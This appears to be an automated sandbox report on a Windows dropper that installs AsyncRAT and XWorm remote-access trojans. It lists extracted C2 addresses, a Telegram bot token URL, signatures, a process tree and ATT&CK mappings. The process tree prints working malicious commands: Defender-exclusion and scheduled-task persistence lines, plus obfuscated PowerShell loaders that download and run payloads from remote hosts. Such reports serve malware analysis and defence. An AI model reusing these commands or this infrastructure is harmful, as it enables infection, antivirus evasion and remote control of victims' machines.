Overview

overview

10

Static

static

3

wow.exe

windows7-x64

7

wow.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-12-2024 20:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    wow.exe

  • Size

    14.8MB

  • MD5

    b2c17e4aaa1ab07e2be2c6e08120c7fe

  • SHA1

    67eb0fbafb9d75d7e95dc8429c09a99e73ed5c74

  • SHA256

    d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d

  • SHA512

    5ec8edc34ebd4329c263fd43a76fbecc69d4af248b86d40ba69df40ba85b78bf0e5abb2fcb3b65708b726cdc3fe594e06f27ae637f98a038b9249c399b52b223

  • SSDEEP

    393216:gOWd863huc1dQJlAoF3MnG3WaiVLedWmoNr/xHWgrHz:5893hr1dQJ3MGGZKUpT

Score
10/10
asyncratxwormdefaultsolarafakediscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://194.38.23.2

Extracted

Family

xworm

C2

127.0.0.1:48990

147.185.221.22:48990
Attributes
  • Install_directory

    %Userprofile%

  • install_file

    svchostt.exe

Extracted

Family

asyncrat

Version

| CRACKED BY https://t.me/xworm_v2

Botnet

SolaraFake

C2

anyone-blogging.gl.at.ply.gg:22284

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    true

  • install_file

    Windows.exe

  • install_folder

    %Temp%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

14.243.221.170:3322

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:8080

127.0.0.1:17027

2.tcp.ngrok.io:6606

2.tcp.ngrok.io:7707

2.tcp.ngrok.io:8808

2.tcp.ngrok.io:8080

2.tcp.ngrok.io:17027
Mutex

ynBzTukwLg8N

Attributes
  • delay

    3

  • install

    false

  • install_file

    Clean.bat

  • install_folder

    %Temp%

aes.plain
aes.plain

Extracted

Family

xworm

Version

5.0

C2

lohoainam2008-36048.portmap.io:36048

Attributes
  • Install_directory

    %AppData%

  • install_file

    Setup.exe

  • telegram

    https://api.telegram.org/bot6189190228:AAF5CGiKGC5p4mkyZfTy1Lp5BrZMWsKu-pk/sendMessage?chat_id=5666777098

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

103.125.189.155:8848

Mutex

DcRatMutex_6565

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Async RAT payload 4 IoCs
    rat
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 26 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 55 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\wow.exe
    "C:\Users\Admin\AppData\Local\Temp\wow.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:556
    • C:\Users\Admin\AppData\Local\Temp\wow.exe
      "C:\Users\Admin\AppData\Local\Temp\wow.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:5004
      • C:\Windows\System32\notepad.exe
        "C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\haus\ldr.ps1"
        3⤵
        • Opens file in notepad (likely ransom note)
        PID:3984
      • C:\Users\Admin\Downloads\haus\TCP.exe
        "C:\Users\Admin\Downloads\haus\TCP.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1608
      • C:\Users\Admin\Downloads\haus\anne.exe
        "C:\Users\Admin\Downloads\haus\anne.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4268
      • C:\Users\Admin\Downloads\haus\Solara_Protect.exe
        "C:\Users\Admin\Downloads\haus\Solara_Protect.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3928
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"' & exit
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2560
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"'
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA548.tmp.bat""
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\SysWOW64\timeout.exe
            timeout 3
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:5024
          • C:\Users\Admin\AppData\Local\Temp\Windows.exe
            "C:\Users\Admin\AppData\Local\Temp\Windows.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4804
      • C:\Users\Admin\Downloads\haus\backd00rhome.exe
        "C:\Users\Admin\Downloads\haus\backd00rhome.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3360
      • C:\Users\Admin\Downloads\haus\com%20surrogate.exe
        "C:\Users\Admin\Downloads\haus\com%20surrogate.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:3440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\haus\com%20surrogate.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com%20surrogate.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5044
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\svchostt.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1068
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\Admin\svchostt.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2432
      • C:\Users\Admin\Downloads\haus\shell.exe
        "C:\Users\Admin\Downloads\haus\shell.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2120
      • C:\Users\Admin\Downloads\haus\kali_tools.exe
        "C:\Users\Admin\Downloads\haus\kali_tools.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2268
      • C:\Users\Admin\Downloads\haus\OLDxTEAM.exe
        "C:\Users\Admin\Downloads\haus\OLDxTEAM.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2028
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 752
          4⤵
          • Program crash
          PID:1156
      • C:\Users\Admin\Downloads\haus\XClient.exe
        "C:\Users\Admin\Downloads\haus\XClient.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:4276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\haus\XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1844
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Setup.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4560
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Setup.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2964
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Setup" /tr "C:\Users\Admin\AppData\Roaming\Setup.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5000
      • C:\Users\Admin\Downloads\haus\evetbeta.exe
        "C:\Users\Admin\Downloads\haus\evetbeta.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4436
      • C:\Users\Admin\Downloads\haus\AsyncClient.exe
        "C:\Users\Admin\Downloads\haus\AsyncClient.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1344
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\haus\DC2111BAT.bat" "
        3⤵
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        PID:3632
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic cpu get name
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2112
        • C:\Windows\system32\find.exe
          find "QEMU"
          4⤵
            PID:4828
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$HQ$ZQBz$HQ$aQBu$Gc$cwBv$G0$ZQB0$Gg$aQBu$Gc$d$$v$GY$ZwBo$Gg$a$Bo$Gg$a$Bo$Gg$a$Bk$Gc$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DU$Mw$3$DY$MQ$y$Cc$L$$g$Cc$a$B0$HQ$c$$6$C8$Lw$x$D$$Mw$u$DI$ZQ$u$DY$Mg$v$HQ$ZQBz$HQ$XwBp$G0$Zw$u$Go$c$Bn$Cc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$D0$I$BE$G8$dwBu$Gw$bwBh$GQ$R$Bh$HQ$YQBG$HI$bwBt$Ew$aQBu$Gs$cw$g$CQ$b$Bp$G4$awBz$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$t$G4$ZQ$g$CQ$bgB1$Gw$b$$p$C$$ew$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FQ$ZQB4$HQ$LgBF$G4$YwBv$GQ$aQBu$Gc$XQ$6$Do$VQBU$EY$O$$u$Ec$ZQB0$FM$d$By$Gk$bgBn$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$UwBU$EE$UgBU$D4$Pg$n$Ds$I$$k$GU$bgBk$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBF$E4$R$$+$D4$Jw$7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$p$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$GU$bgBk$EY$b$Bh$Gc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$LQBn$GU$I$$w$C$$LQBh$G4$Z$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQBn$HQ$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$KQ$g$Hs$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$r$D0$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C4$T$Bl$G4$ZwB0$Gg$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$C$$PQ$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQ$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$UwB1$GI$cwB0$HI$aQBu$Gc$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$L$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$JwB0$Hg$d$$u$GM$cgBj$GQ$awBl$GU$Lw$y$DY$Lg$y$D$$MQ$u$D$$Mg$u$DM$M$$x$C8$Lw$6$H$$d$B0$Gg$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$UgBl$Gc$QQBz$G0$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('$','A')));powershell.exe $OWjuxD"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3460
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/testingsomethingt/fghhhhhhhhhdg/downloads/new_img.jpg?537612', 'http://103.2e.62/test_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.crcdkee/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2464
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2672
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            pOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:564
            • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
              "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""
              5⤵
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of SetWindowsHookEx
              PID:4660
    • C:\Windows\System32\GameBarPresenceWriter.exe
      "C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
      1⤵
      • Network Service Discovery
      PID:2392
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Suspicious use of SetWindowsHookEx
      PID:3612
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2028 -ip 2028
      1⤵
        PID:2832
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
        1⤵
        • Checks processor information in registry
        • Modifies registry class
        PID:452
      • C:\Users\Admin\svchostt.exe
        C:\Users\Admin\svchostt.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:5692
      • C:\Users\Admin\AppData\Roaming\Setup.exe
        C:\Users\Admin\AppData\Roaming\Setup.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:5696
      • C:\Users\Admin\svchostt.exe
        C:\Users\Admin\svchostt.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:6068
      • C:\Users\Admin\AppData\Roaming\Setup.exe
        C:\Users\Admin\AppData\Roaming\Setup.exe
        1⤵
        • Executes dropped EXE
        PID:6064

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Network Service Discovery

      1
      T1046

      Query Registry

      4
      T1012

      System Information Discovery

      4
      T1082

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      Lateral Movement

      Collection

      Command and Control

      Web Service

      1
      T1102

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\TCDEEF1.tmp\gb.xsl
        Filesize

        262KB

        MD5

        51d32ee5bc7ab811041f799652d26e04

        SHA1

        412193006aa3ef19e0a57e16acf86b830993024a

        SHA256

        6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

        SHA512

